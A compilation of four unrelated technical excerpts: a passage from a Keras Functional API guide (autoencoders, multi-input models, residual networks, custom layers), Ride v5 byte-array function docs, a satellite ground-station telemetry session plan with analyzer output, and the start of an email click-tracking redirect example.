decoder_output = layers.Conv2DTranspose(1, 3, activation='relu')(x)
autoencoder = keras.Model(encoder_input, decoder_output, name='autoencoder')
autoencoder.summary()
Model: "encoder" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= img (InputLayer) [(None, 28, 28, 1)] 0 _________________________________________________________________ conv2d (Conv2D) (None, 26, 26, 16) 160 _________________________________________________________________ conv2d_1 (Conv2D) (None, 24, 24, 32) 4640 _________________________________________________________________ max_pooling2d (MaxPooling2D) (None, 8, 8, 32) 0 _________________________________________________________________ conv2d_2 (Conv2D) (None, 6, 6, 32) 9248 _________________________________________________________________ conv2d_3 (Conv2D) (None, 4, 4, 16) 4624 _________________________________________________________________ global_max_pooling2d (Global (None, 16) 0 ================================================================= Total params: 18,672 Trainable params: 18,672 Non-trainable params: 0 _________________________________________________________________ Model: "autoencoder" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= img (InputLayer) [(None, 28, 28, 1)] 0 _________________________________________________________________ conv2d (Conv2D) (None, 26, 26, 16) 160 _________________________________________________________________ conv2d_1 (Conv2D) (None, 24, 24, 32) 4640 _________________________________________________________________ max_pooling2d (MaxPooling2D) (None, 8, 8, 32) 0 _________________________________________________________________ conv2d_2 (Conv2D) (None, 6, 6, 32) 9248 _________________________________________________________________ conv2d_3 (Conv2D) (None, 4, 4, 16) 4624 _________________________________________________________________ global_max_pooling2d (Global (None, 16) 0 _________________________________________________________________ reshape (Reshape) (None, 4, 4, 1) 0 _________________________________________________________________ conv2d_transpose (Conv2DTran (None, 6, 6, 16) 160 _________________________________________________________________ conv2d_transpose_1 (Conv2DTr (None, 8, 8, 32) 4640 _________________________________________________________________ up_sampling2d (UpSampling2D) (None, 24, 24, 32) 0 _________________________________________________________________ conv2d_transpose_2 (Conv2DTr (None, 26, 26, 16) 4624 _________________________________________________________________ conv2d_transpose_3 (Conv2DTr (None, 28, 28, 1) 145 ================================================================= Total params: 28,241 Trainable params: 28,241 Non-trainable params: 0 _________________________________________________________________
Note that we make the decoding architecture strictly symmetric to the encoding architecture, so that the output shape is the same as the input shape (28, 28, 1). The reverse of a Conv2D layer is a Conv2DTranspose layer, and the reverse of a MaxPooling2D layer is an UpSampling2D layer.
All models are callable, just like layers
You can treat any model as if it were a layer, by calling it on an Input or on the output of another layer. Note that by calling a model you aren't just reusing its architecture, you're also reusing its weights.
Let's see this in action. Here's a different take on the autoencoder example that creates an encoder model and a decoder model, and chains them in two calls to obtain the autoencoder model:
encoder_input = keras.Input(shape=(28, 28, 1), name='original_img')
x = layers.Conv2D(16, 3, activation='relu')(encoder_input)
x = layers.Conv2D(32, 3, activation='relu')(x)
x = layers.MaxPooling2D(3)(x)
x = layers.Conv2D(32, 3, activation='relu')(x)
x = layers.Conv2D(16, 3, activation='relu')(x)
encoder_output = layers.GlobalMaxPooling2D()(x)
encoder = keras.Model(encoder_input, encoder_output, name='encoder')
encoder.summary()
decoder_input = keras.Input(shape=(16,), name='encoded_img')
x = layers.Reshape((4, 4, 1))(decoder_input)
x = layers.Conv2DTranspose(16, 3, activation='relu')(x)
x = layers.Conv2DTranspose(32, 3, activation='relu')(x)
x = layers.UpSampling2D(3)(x)
x = layers.Conv2DTranspose(16, 3, activation='relu')(x)
decoder_output = layers.Conv2DTranspose(1, 3, activation='relu')(x)
decoder = keras.Model(decoder_input, decoder_output, name='decoder')
decoder.summary()
autoencoder_input = keras.Input(shape=(28, 28, 1), name='img')
encoded_img = encoder(autoencoder_input)
decoded_img = decoder(encoded_img)
autoencoder = keras.Model(autoencoder_input, decoded_img, name='autoencoder')
autoencoder.summary()
Model: "encoder" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= original_img (InputLayer) [(None, 28, 28, 1)] 0 _________________________________________________________________ conv2d_4 (Conv2D) (None, 26, 26, 16) 160 _________________________________________________________________ conv2d_5 (Conv2D) (None, 24, 24, 32) 4640 _________________________________________________________________ max_pooling2d_1 (MaxPooling2 (None, 8, 8, 32) 0 _________________________________________________________________ conv2d_6 (Conv2D) (None, 6, 6, 32) 9248 _________________________________________________________________ conv2d_7 (Conv2D) (None, 4, 4, 16) 4624 _________________________________________________________________ global_max_pooling2d_1 (Glob (None, 16) 0 ================================================================= Total params: 18,672 Trainable params: 18,672 Non-trainable params: 0 _________________________________________________________________ Model: "decoder" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= encoded_img (InputLayer) [(None, 16)] 0 _________________________________________________________________ reshape_1 (Reshape) (None, 4, 4, 1) 0 _________________________________________________________________ conv2d_transpose_4 (Conv2DTr (None, 6, 6, 16) 160 _________________________________________________________________ conv2d_transpose_5 (Conv2DTr (None, 8, 8, 32) 4640 _________________________________________________________________ up_sampling2d_1 (UpSampling2 (None, 24, 24, 32) 0 _________________________________________________________________ conv2d_transpose_6 (Conv2DTr (None, 26, 26, 16) 4624 _________________________________________________________________ conv2d_transpose_7 (Conv2DTr (None, 28, 28, 1) 145 ================================================================= Total params: 9,569 Trainable params: 9,569 Non-trainable params: 0 _________________________________________________________________ Model: "autoencoder" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= img (InputLayer) [(None, 28, 28, 1)] 0 _________________________________________________________________ encoder (Functional) (None, 16) 18672 _________________________________________________________________ decoder (Functional) (None, 28, 28, 1) 9569 ================================================================= Total params: 28,241 Trainable params: 28,241 Non-trainable params: 0 _________________________________________________________________
As you can see, models can be nested: a model can contain sub-models (since a model is just like a layer).
A common use case for model nesting is ensembling. As an example, here's how to ensemble a set of models into a single model that averages their predictions:
def get_model():
inputs = keras.Input(shape=(128,))
outputs = layers.Dense(1, activation='sigmoid')(inputs)
return keras.Model(inputs, outputs)
model1 = get_model()
model2 = get_model()
model3 = get_model()
inputs = keras.Input(shape=(128,))
y1 = model1(inputs)
y2 = model2(inputs)
y3 = model3(inputs)
outputs = layers.average([y1, y2, y3])
ensemble_model = keras.Model(inputs=inputs, outputs=outputs)
Manipulating complex graph topologies
Models with multiple inputs and outputs
The Functional API makes it easy to manipulate multiple inputs and outputs. This cannot be handled with the Sequential API.
Here's a simple example.
Suppose you're building a system for ranking custom issue tickets by priority and routing them to the right department.
Your model will have 3 inputs:
Ticket title (text input)
Ticket body text (text input)
Any tags added by the user (categorical input)
It will have two outputs:
Priority score between 0 and 1 (scalar sigmoid output)
The department that should handle the ticket (softmax output over the set of departments)
Let's build this model in a few lines with the Functional API.
num_tags = 12 # Number of unique issue tags
num_words = 10000 # Size of vocabulary obtained when preprocessing text data
num_departments = 4 # Number of departments for predictions
title_input = keras.Input(shape=(None,), name='title') # Variable-length sequence of ints
body_input = keras.Input(shape=(None,), name='body') # Variable-length sequence of ints
tags_input = keras.Input(shape=(num_tags,), name='tags') # Binary vectors of size `num_tags`
# Embed each word in the title into a 64-dimensional vector
title_features = layers.Embedding(num_words, 64)(title_input)
# Embed each word in the body into a 64-dimensional vector
body_features = layers.Embedding(num_words, 64)(body_input)
# Reduce the sequence of embedded words in the title into a single 128-dimensional vector
title_features = layers.LSTM(128)(title_features)
# Reduce the sequence of embedded words in the body into a single 32-dimensional vector
body_features = layers.LSTM(32)(body_features)
# Merge all available features into a single large vector via concatenation
x = layers.concatenate([title_features, body_features, tags_input])
# Stick a logistic regression for priority prediction on top of the features
priority_pred = layers.Dense(1, activation='sigmoid', name='priority')(x)
# Stick a department classifier on top of the features
department_pred = layers.Dense(num_departments, activation='softmax', name='department')(x)
# Instantiate an end-to-end model predicting both priority and department
model = keras.Model(inputs=[title_input, body_input, tags_input],
outputs=[priority_pred, department_pred])
Plotting the model:
keras.utils.plot_model(model, 'multi_input_and_output_model.png', show_shapes=True)
When compiling this model, we can assign different losses to each output. You can even assign different weights to each loss, to modulate its contribution to the total training loss.
model.compile(optimizer=keras.optimizers.RMSprop(1e-3),
loss=['binary_crossentropy', 'categorical_crossentropy'],
loss_weights=[1., 0.2])
Since we gave names to our output layers, we could also specify the losses like this:
model.compile(optimizer=keras.optimizers.RMSprop(1e-3),
loss={'priority': 'binary_crossentropy',
'department': 'categorical_crossentropy'},
loss_weights=[1., 0.2])
We can train the model by passing lists of NumPy arrays of inputs and targets:
import numpy as np
# Dummy input data
title_data = np.random.randint(num_words, size=(1280, 10))
body_data = np.random.randint(num_words, size=(1280, 100))
tags_data = np.random.randint(2, size=(1280, num_tags)).astype('float32')
# Dummy target data
priority_targets = np.random.random(size=(1280, 1))
dept_targets = np.random.randint(2, size=(1280, num_departments))
model.fit({'title': title_data, 'body': body_data, 'tags': tags_data},
{'priority': priority_targets, 'department': dept_targets},
epochs=2,
batch_size=32)
Epoch 1/2 40/40 [==============================] - 0s 12ms/step - loss: 1.3044 - priority_loss: 0.7146 - department_loss: 2.9490 Epoch 2/2 40/40 [==============================] - 0s 11ms/step - loss: 1.2906 - priority_loss: 0.6993 - department_loss: 2.9562 <tensorflow.python.keras.callbacks.History at 0x7fb48ae72f60>
When calling fit with a Dataset object, it should yield either a tuple of lists like ([title_data, body_data, tags_data], [priority_targets, dept_targets]) or a tuple of dicts like ({'title': title_data, 'body': body_data, 'tags': tags_data}, {'priority': priority_targets, 'department': dept_targets}).
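A minimal sketch of that second form, reusing the dummy arrays generated above:
import tensorflow as tf

# Build a Dataset of (inputs_dict, targets_dict) pairs, batched as before.
dataset = tf.data.Dataset.from_tensor_slices((
    {'title': title_data, 'body': body_data, 'tags': tags_data},
    {'priority': priority_targets, 'department': dept_targets}
)).batch(32)

model.fit(dataset, epochs=2)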
For a more detailed explanation, see the complete Guide to training and evaluation.
A toy residual network model
In addition to models with multiple inputs and outputs, the Functional API makes it easy to manipulate non-linear connectivity topologies, that is, models where layers are not connected sequentially. This also cannot be handled with the Sequential API (as its name indicates).
A common use case for this is residual connections.
Let's build a toy ResNet model for CIFAR10 to demonstrate this.
inputs = keras.Input(shape=(32, 32, 3), name='img')
x = layers.Conv2D(32, 3, activation='relu')(inputs)
x = layers.Conv2D(64, 3, activation='relu')(x)
block_1_output = layers.MaxPooling2D(3)(x)
x = layers.Conv2D(64, 3, activation='relu', padding='same')(block_1_output)
x = layers.Conv2D(64, 3, activation='relu', padding='same')(x)
block_2_output = layers.add([x, block_1_output])
x = layers.Conv2D(64, 3, activation='relu', padding='same')(block_2_output)
x = layers.Conv2D(64, 3, activation='relu', padding='same')(x)
block_3_output = layers.add([x, block_2_output])
x = layers.Conv2D(64, 3, activation='relu')(block_3_output)
x = layers.GlobalAveragePooling2D()(x)
x = layers.Dense(256, activation='relu')(x)
x = layers.Dropout(0.5)(x)
outputs = layers.Dense(10, activation='softmax')(x)
model = keras.Model(inputs, outputs, name='toy_resnet')
model.summary()
Model: "toy_resnet" __________________________________________________________________________________________________ Layer (type) Output Shape Param # Connected to ================================================================================================== img (InputLayer) [(None, 32, 32, 3)] 0 __________________________________________________________________________________________________ conv2d_8 (Conv2D) (None, 30, 30, 32) 896 img[0][0] __________________________________________________________________________________________________ conv2d_9 (Conv2D) (None, 28, 28, 64) 18496 conv2d_8[0][0] __________________________________________________________________________________________________ max_pooling2d_2 (MaxPooling2D) (None, 9, 9, 64) 0 conv2d_9[0][0] __________________________________________________________________________________________________ conv2d_10 (Conv2D) (None, 9, 9, 64) 36928 max_pooling2d_2[0][0] __________________________________________________________________________________________________ conv2d_11 (Conv2D) (None, 9, 9, 64) 36928 conv2d_10[0][0] __________________________________________________________________________________________________ add (Add) (None, 9, 9, 64) 0 conv2d_11[0][0] max_pooling2d_2[0][0] __________________________________________________________________________________________________ conv2d_12 (Conv2D) (None, 9, 9, 64) 36928 add[0][0] __________________________________________________________________________________________________ conv2d_13 (Conv2D) (None, 9, 9, 64) 36928 conv2d_12[0][0] __________________________________________________________________________________________________ add_1 (Add) (None, 9, 9, 64) 0 conv2d_13[0][0] add[0][0] __________________________________________________________________________________________________ conv2d_14 (Conv2D) (None, 7, 7, 64) 36928 add_1[0][0] __________________________________________________________________________________________________ global_average_pooling2d (Globa (None, 64) 0 conv2d_14[0][0] __________________________________________________________________________________________________ dense_9 (Dense) (None, 256) 16640 global_average_pooling2d[0][0] __________________________________________________________________________________________________ dropout (Dropout) (None, 256) 0 dense_9[0][0] __________________________________________________________________________________________________ dense_10 (Dense) (None, 10) 2570 dropout[0][0] ================================================================================================== Total params: 223,242 Trainable params: 223,242 Non-trainable params: 0 __________________________________________________________________________________________________
Plotting the model:
keras.utils.plot_model(model, 'mini_resnet.png', show_shapes=True)
Let's train it:
(x_train, y_train), (x_test, y_test) = keras.datasets.cifar10.load_data()
x_train = x_train.astype('float32') / 255.
x_test = x_test.astype('float32') / 255.
y_train = keras.utils.to_categorical(y_train, 10)
y_test = keras.utils.to_categorical(y_test, 10)
model.compile(optimizer=keras.optimizers.RMSprop(1e-3),
loss='categorical_crossentropy',
metrics=['acc'])
model.fit(x_train, y_train,
batch_size=64,
epochs=1,
validation_split=0.2)
Downloading data from https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz 170500096/170498071 [==============================] - 2s 0us/step 625/625 [==============================] - 4s 6ms/step - loss: 1.8840 - acc: 0.2842 - val_loss: 1.5108 - val_acc: 0.4309 <tensorflow.python.keras.callbacks.History at 0x7fb48a701f28>
Shared layers
Another good use of the Functional API is for models that use shared layers. Shared layers are layer instances that get reused multiple times in the same model: they learn features that correspond to multiple paths in the graph of layers.
Shared layers are often used to encode inputs that come from similar spaces (say, two different pieces of text with a similar vocabulary), since they make it possible to share information across these different inputs and to train such a model on less data. If a given word is seen in one of the inputs, that benefits the processing of all inputs that pass through the shared layer.
To share a layer in the Functional API, just call the same layer instance multiple times. For instance, here's an Embedding layer shared across two different text inputs:
# Embedding for 1000 unique words, mapped to 128-dimensional vectors
shared_embedding = layers.Embedding(1000, 128)
# Variable-length sequence of integers
text_input_a = keras.Input(shape=(None,), dtype='int32')
# Variable-length sequence of integers
text_input_b = keras.Input(shape=(None,), dtype='int32')
# We reuse the same layer to encode both inputs
encoded_input_a = shared_embedding(text_input_a)
encoded_input_b = shared_embedding(text_input_b)
Extracting and reusing nodes in the graph of layers
Because the graph of layers you're manipulating in the Functional API is a static data structure, it can be accessed and inspected. This is how we're able to plot Functional models as images, for instance.
This also means that we can access the activations of intermediate layers ("nodes" in the graph) and reuse them elsewhere. This is extremely useful for feature extraction, for example!
Let's look at an example. This is a VGG19 model with weights pre-trained on ImageNet:
from tensorflow.keras.applications import VGG19
vgg19 = VGG19()
Downloading data from https://storage.googleapis.com/tensorflow/keras-applications/vgg19/vgg19_weights_tf_dim_ordering_tf_kernels.h5 574717952/574710816 [==============================] - 2s 0us/step
And these are the intermediate activations of the model, obtained by querying the graph data structure:
features_list = [layer.output for layer in vgg19.layers]
We can use these features to create a new feature-extraction model that returns the values of the intermediate layer activations, and we can do all of this in three lines.
feat_extraction_model = keras.Model(inputs=vgg19.input, outputs=features_list)
img = np.random.random((1, 224, 224, 3)).astype('float32')
extracted_features = feat_extraction_model(img)
This comes in handy when implementing neural style transfer, among other things.
Extending the API by writing custom layers
tf.keras has a wide range of built-in layers. Here are a few examples:
Convolutional layers: Conv1D, Conv2D, Conv3D, Conv2DTranspose, etc.
Pooling layers: MaxPooling1D, MaxPooling2D, MaxPooling3D, AveragePooling1D, etc.
RNN layers: GRU, LSTM, ConvLSTM2D, etc.
BatchNormalization, Dropout, Embedding, etc.
If you don't find what you need, it's easy to extend the API by creating your own layers.
All layers subclass the Layer class and implement:
A call method, which specifies the computation done by the layer.
A build method, which creates the weights of the layer (note that this is just a style convention; you could also create weights in __init__).
To learn more about creating layers from scratch, check out the Guide to writing layers and models from scratch.
Here's a simple implementation of a Dense layer:
class CustomDense(layers.Layer):
def __init__(self, units=32):
super(CustomDense, self).__init__()
self.units = units
def build(self, input_shape):
self.w = self.add_weight(shape=(input_shape[-1], self.units),
initializer='random_normal',
trainable=True)
self.b = self.add_weight(shape=(self.units,),
initializer='random_normal',
trainable=True)
def call(self, inputs):
return tf.matmul(inputs, self.w) + self.b
inputs = keras.Input((4,))
outputs = CustomDense(10)(inputs)
model = keras.Model(inputs, outputs)
If you want your custom layer to support serialization, you should also define a get_config method, which returns the constructor arguments of the layer instance:
class CustomDense(layers.Layer):
def __init__(self, units=32):
super(CustomDense, self).__init__()
self.units = units
def build(self, input_shape):
self.w = self.add_weight(shape=(input_shape[-1], self.units),
initializer='random_normal',
trainable=True)
self.b = self.add_weight(shape=(self.units,),
initializer='random_normal',
trainable=True)
def call(self, inputs):
return tf.matmul(inputs, self.w) + self.b
def get_config(self):
return {'units': self.units}
inputs = keras.Input((4,))
outputs = CustomDense(10)(inputs)
model = keras.Model(inputs, outputs)
config = model.get_config()
new_model = keras.Model.from_config(
config, custom_objects={'CustomDense': CustomDense})
Optionally, you could also implement the class method from_config(cls, config), which handles recreating a layer instance from its config dictionary. The default implementation of from_config is:
def from_config(cls, config):
return cls(**config)
When to use the Functional API
How do you decide whether to use the Functional API to create a new model, or to just subclass the Model class directly?
In general, the Functional API is higher-level, easier and safer to use, and it has a number of features that subclassed models don't support.
However, model subclassing gives you greater flexibility when building models that aren't easily expressible as directed acyclic graphs of layers (for instance, you couldn't implement a Tree-RNN with the Functional API; you'd have to subclass Model directly).
These are the strengths of the Functional API:
The properties listed below are also true of Sequential models (which are also data structures), but they aren't true of subclassed models (which are Python bytecode, not data structures).
It is less verbose.
No super(MyClass, self).__init__(...), no def call(self, ...):, etc.
Compare:
inputs = keras.Input(shape=(32,))
x = layers.Dense(64, activation='relu')(inputs)
outputs = layers.Dense(10)(x)
mlp = keras.Model(inputs, outputs)
With the subclassed version:
class MLP(keras.Model):
def __init__(self, **kwargs):
super(MLP, self).__init__(**kwargs)
self.dense_1 = layers.Dense(64, activation='relu')
self.dense_2 = layers.Dense(10)
def call(self, inputs):
x = self.dense_1(inputs)
return self.dense_2(x)
# Instantiate the model.
mlp = MLP()
# Needed to create the model's state.
# The model doesn't have a state until it's called at least once.
_ = mlp(tf.zeros((1, 32)))
It validates your model while you're defining it.
In the Functional API, your input specification (shape and dtype) is created in advance (via Input), and every time you call a layer, the layer checks that the specification passed to it matches its assumptions, and it will raise a helpful error message if not.
This guarantees that any model you can build with the Functional API will run. All debugging (other than convergence-related debugging) happens statically during model construction, and not at execution time. This is similar to type checking in a compiler.
Your Functional model is plottable and inspectable.
You can plot the model as a graph, and you can easily access intermediate nodes in this graph, for example to extract and reuse the activations of intermediate layers, as we saw in an earlier example:
features_list = [layer.output for layer in vgg19.layers]
feat_extraction_model = keras.Model(inputs=vgg19.input, outputs=features_list)
Your Functional model can be serialized or cloned.
Because a Functional model is a data structure rather than a piece of code, it's safely serializable and can be saved as a single file that lets you recreate the exact same model without having access to any of the original code. See our guide to saving and serialization for more details.
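For instance, a minimal sketch reusing the Functional model defined earlier in this guide:
# Rebuild an identical architecture from the config dict alone
# (the weights are re-initialized, not copied).
config = model.get_config()
reconstructed = keras.Model.from_config(config)

# Or clone the architecture and copy the weights explicitly:
clone = keras.models.clone_model(model)
clone.set_weights(model.get_weights())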
These are the weaknesses of the Functional API:
It does not support dynamic architectures.
The Functional API treats models as DAGs of layers. This is true for most deep learning architectures, but not all: for example, recursive networks or Tree-RNNs do not follow this assumption and cannot be implemented in the Functional API.
Sometimes you just need to write everything from scratch.
When writing advanced architectures, you may want to do things that are outside the scope of "defining a DAG of layers": for instance, you may want to expose multiple custom training and inference methods on your model instance. This requires subclassing.
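As a hedged sketch of what that could look like (the model and method names below are invented for the example, not an official API):
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers

class Autoscorer(keras.Model):
    """Toy subclassed model exposing more than one inference entry point."""
    def __init__(self, **kwargs):
        super(Autoscorer, self).__init__(**kwargs)
        self.encoder = layers.Dense(16, activation='relu')
        self.decoder = layers.Dense(32)
        self.scorer = layers.Dense(1, activation='sigmoid')

    def call(self, inputs):
        # Standard forward pass used by fit()/predict().
        return self.decoder(self.encoder(inputs))

    def score(self, inputs):
        # A second, custom inference path that is not part of the call() DAG.
        return self.scorer(self.encoder(inputs))

model = Autoscorer()
x = tf.zeros((1, 32))
_ = model(x)        # standard forward pass
_ = model.score(x)  # custom method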
To dive deeper into the differences between the Functional API and model subclassing, you can read "What are Symbolic and Imperative APIs in TensorFlow 2.0?".
Mix and match different API styles
Importantly, choosing between the Functional API and model subclassing is not a binary decision that restricts you to one category of models. All models in the tf.keras API can interact with each other, whether they are Sequential models, Functional models, or subclassed models/layers written from scratch.
You can always use a Functional model or a Sequential model as part of a subclassed model or layer:
units = 32
timesteps = 10
input_dim = 5
# Define a Functional model
inputs = keras.Input((None, units))
x = layers.GlobalAveragePooling1D()(inputs)
outputs = layers.Dense(1, activation='sigmoid')(x)
model = keras.Model(inputs, outputs)
class CustomRNN(layers.Layer):
    def __init__(self):
        super(CustomRNN, self).__init__()
        self.units = units
        self.projection_1 = layers.Dense(units=units, activation='tanh')
        self.projection_2 = layers.Dense(units=units, activation='tanh')
        # Our previously-defined Functional model
        self.classifier = model

    def call(self, inputs):
        outputs = []
        state = tf.zeros(shape=(inputs.shape[0], self.units))
        for t in range(inputs.shape[1]):
            x = inputs[:, t, :]
            h = self.projection_1(x)
            y = h + self.projection_2(state)
            state = y
            outputs.append(y)
        features = tf.stack(outputs, axis=1)
        print(features.shape)
        return self.classifier(features)
rnn_model = CustomRNN()
_ = rnn_model(tf.zeros((1, timesteps, input_dim)))
(1, 10, 32)
Conversely, you can use any subclassed Layer or Model in the Functional API as long as it implements a call method that follows one of the following patterns:
call(self, inputs, **kwargs) - where inputs is a tensor or a nested structure of tensors (e.g. a list of tensors), and where **kwargs are non-tensor (non-input) arguments.
call(self, inputs, training=None, **kwargs) - where training is a boolean indicating whether the layer should behave in training mode or in inference mode.
call(self, inputs, mask=None, **kwargs) - where mask is a boolean mask tensor (useful for RNNs, for instance).
call(self, inputs, training=None, mask=None, **kwargs) - of course, you can have both masking-specific and training-specific behavior at the same time.
Additionally, if you implement the get_config method on your custom Layer or Model, the Functional models you create with it will still be serializable and clonable.
Here's a quick example where we use a custom RNN, written from scratch, in a Functional model:
units = 32
timesteps = 10
input_dim = 5
batch_size = 16
class CustomRNN(layers.Layer):
    def __init__(self):
        super(CustomRNN, self).__init__()
        self.units = units
        self.projection_1 = layers.Dense(units=units, activation='tanh')
        self.projection_2 = layers.Dense(units=units, activation='tanh')
        self.classifier = layers.Dense(1, activation='sigmoid')

    def call(self, inputs):
        outputs = []
        state = tf.zeros(shape=(inputs.shape[0], self.units))
        for t in range(inputs.shape[1]):
            x = inputs[:, t, :]
            h = self.projection_1(x)
            y = h + self.projection_2(state)
            state = y
            outputs.append(y)
        features = tf.stack(outputs, axis=1)
        return self.classifier(features)
# Note that we specify a static batch size for the inputs with the `batch_shape`
# arg, because the inner computation of `CustomRNN` requires a static batch size
# (when we create the zeros tensor `state`).
inputs = keras.Input(batch_shape=(batch_size, timesteps, input_dim))
x = layers.Conv1D(32, 3)(inputs)
outputs = CustomRNN()(x)
model = keras.Model(inputs, outputs)
rnn_model = CustomRNN()
_ = rnn_model(tf.zeros((1, 10, 5)))
This concludes our guide to the Keras Functional API!
You now have at your fingertips a powerful set of tools for building deep learning models.
|
# [Ride v5] Byte array functions
# Name Description Complexity
1 drop(ByteVector, Int): ByteVector Returns the byte array without the first N bytes 6
2 dropRight(ByteVector, Int): ByteVector Returns the byte array without the last N bytes 6
3 size(ByteVector): Int Returns the number of bytes in the byte array 1
4 take(ByteVector, Int): ByteVector Returns the first N bytes of the byte array 6
5 takeRight(ByteVector, Int): ByteVector Returns the last N bytes of the byte array 6
# drop(ByteVector, Int): ByteVector
Returns the byte array without the first N bytes.
drop(xs: ByteVector, number: Int): ByteVector
# Parameters
# xs: ByteVector
Byte array.
Number N.
# Examples
drop("Ride".toBytes(), 2) # Returns the byte array without the first 2 bytes
drop(125.toBytes(), 2) # Returns the byte array without the first 2 bytes
drop(base16'52696465', 3) # Returns the byte array without the first 3 bytes
drop(base58'37BPKA', 3) # Returns the byte array without the first 3 bytes
drop(base64'UmlkZQ==', 3) # Returns the byte array without the first 3 bytes
# dropRight(ByteVector, Int): ByteVector
Returns the byte array without the last N bytes.
dropRight(xs: ByteVector, number: Int): ByteVector
# Parameters
# xs: ByteVector
Byte array.
Number N.
# Examples
dropRight("Ride".toBytes(), 2) # Returns the byte array without the last 2 bytes
dropRight(125.toBytes(), 2) # Returns the byte array without the last 2 bytes
dropRight(base16'52696465', 3) # Returns the byte array without the last 3 bytes
dropRight(base58'37BPKA', 3) # Returns the byte array without the last 3 bytes
dropRight(base64'UmlkZQ==', 3) # Returns the byte array without the last 3 bytes
# size(ByteVector): Int
Returns the number of bytes in the byte array.
size(byteVector: ByteVector): Int
# Parameters
# byteVector: ByteVector
Byte array.
# Examples
size("Hello".toBytes()) # Returns 5
size("Hello world".toBytes()) # Returns 11
size(64.toBytes()) # Returns 8 because all integers in Ride take 8 bytes
size(200000.toBytes()) # Returns 8 because all integers in Ride take 8 bytes
size(base58'37BPKA') # Returns 4
# take(ByteVector, Int): ByteVector
Returns the first N bytes of the byte array.
take(xs: ByteVector, number: Int): ByteVector
# Parameters
# xs: ByteVector
Byte array.
Number N.
# Examples
take(base58'37BPKA', 0) # Returns the empty byte array
take(base58'37BPKA', 1) # Returns the byte array consisting of first byte of initial byte array
take(base58'37BPKA', 15) # Returns whole byte array
take(base58'37BPKA', -10) # Returns the empty byte array
# takeRight(ByteVector, Int): ByteVector
Returns the last N bytes of the byte array.
takeRight(xs: ByteVector, number: Int): ByteVector
# Parameters
# xs: ByteVector
Byte array.
Number N.
# Examples
takeRight(base58'37BPKA', 2) # Returns the last 2 bytes of the byte array
|
Index Start Time Stop Time Max. Elevation Phase Primary GS Type Tasks Status
151 2018-12-28 10:41:21+01:00 2018-12-28 10:53:49+01:00 N/A° Extended Mission N/A [TBD] ☑
Goal
Telemetry download. Energy saving.
Tasklist
tasks = [
[[tc.SetBitrate(1, BaudRate.BaudRate9600), 5], SendLoop, WaitMode.NoWait],
[[tc.SendBeacon(), 20], SendLoop, WaitMode.NoWait],
[tc.ListFiles(2, '/'), Send, WaitMode.Wait],
# wait for better SNR
[[tc.SendBeacon(), 20], SendLoop, WaitMode.NoWait],
# More telemetry between sessions 148 and 151
[tc.DownloadFile(10, '/telemetry.current', [i for i in range(6, 370, 24)]), Send, WaitMode.Wait],
[tc.DownloadFile(11, '/telemetry.previous', [i for i in range(1206, 2280, 50)]), Send, WaitMode.Wait],
[tc.DownloadFile(12, '/telemetry.previous', [i for i in range(1212, 2280, 50)]), Send, WaitMode.Wait],
[tc.DownloadFile(13, '/telemetry.current', [i for i in range(18, 370, 24)]), Send, WaitMode.Wait],
[tc.DownloadFile(14, '/telemetry.previous', [i for i in range(1218, 2280, 50)]), Send, WaitMode.Wait],
[tc.DownloadFile(15, '/telemetry.previous', [i for i in range(1231, 2280, 50)]), Send, WaitMode.Wait],
[tc.DownloadFile(16, '/telemetry.previous', [i for i in range(1237, 2280, 50)]), Send, WaitMode.Wait],
[tc.DownloadFile(17, '/telemetry.previous', [i for i in range(1243, 2280, 50)]), Send, WaitMode.Wait],
[[tc.SendBeacon(), 20], SendLoop, WaitMode.NoWait],
]
Analyzer Output
======================================= General =======================================
[Warning] Bitrate not restored (1200)
======================== Resources utilization for THIS session ========================
# Name Is Current Session Session Session Session Session Session Notes
scheduled? bitrate downlink downlink uplink uplink power power
[bps] frames duration frames duration budget budget
count [s] count [s] energy mean
[mWh] power
[mW]
--- ------------ ------------ --------- ---------- ---------- --------- ---------- --------- --------- ---------------------------------------------------------------------
1 SetBitrate False 9600 1 0.32 1 1.03 0.3 N/A [Info] In SendLoop mode - a telecommand in every .
2 SendBeacon False 9600 1 0.51 1 1.02 0.4 N/A [Info] In SendLoop mode - a telecommand in every .
3 ListFiles False 9600 5 1.28 1 1.04 1.1 N/A [Warning] Waiting is not recommended
4 SendBeacon False 9600 1 0.51 1 1.02 0.4 N/A [Info] In SendLoop mode - a telecommand in every .
5 DownloadFile False 9600 16 3.41 1 1.59 2.8 N/A
6 DownloadFile False 9600 22 4.57 1 1.75 3.8 N/A
7 DownloadFile False 9600 22 4.57 1 1.75 3.8 N/A
8 DownloadFile False 9600 15 3.22 1 1.56 2.7 N/A
9 DownloadFile False 9600 22 4.57 1 1.75 3.8 N/A
10 DownloadFile False 9600 21 4.38 1 1.73 3.6 N/A
11 DownloadFile False 9600 21 4.38 1 1.73 3.6 N/A
12 DownloadFile False 9600 21 4.38 1 1.73 3.6 N/A
13 SendBeacon False 9600 1 0.51 1 1.02 0.4 N/A [Info] In SendLoop mode - a telecommand in every .
Session downlink frames count: 169
Session downlink duration [s]: 36.59
Session uplink frames count: 13
Session uplink duration [s]: 18.72
Session power budget energy [mWh]: 30.5
Session power budget mean power [mW]: N/A
================ Resources utilization for SCHEDULED experiments or tasks ================
[Info] No scheduled experiments or tasks.
Artifacts
waterfalls
files
telemetry.previous
elka_versions
downlink_frames.txt
telemetry.current
beacons.txt
requested_files.txt
file_list_2.txt
elka_downlink.frames
fp-gs_downlink.frames
all.frames
fp-gs_versions
|
Users tend to engage with emails even when they aren't engaged with your app. Thus, it's important to track how they interact with your emails.
Tracking clicks in emails works via redirects. You can use our client libraries to generate a redirect link.
Example
// the url to redirect to
const target_url = 'http://mysite.com/detail';
// track the impressions and a click
const impression = {
content_list: ['tweet:1', 'tweet:2', 'tweet:3'],
user_data: 'tommaso',
location: 'email',
feed_id: 'user:global'
};
const engagement = {
content: 'tweet:2',
label: 'click',
position: 1,
user_data: 'tommaso',
location: 'email',
feed_id: 'user:global'
};
const events = [impression, engagement];
const tracking_url = client.client.createRedirectUrl(target_url, "tommaso", events);
// when the user opens the tracking url in their browser, they get redirected to the target url and the events are added to our analytics platform
# the url to redirect to
target_url = 'http://mysite.com/detail'
# track the impressions and a click
impression = {
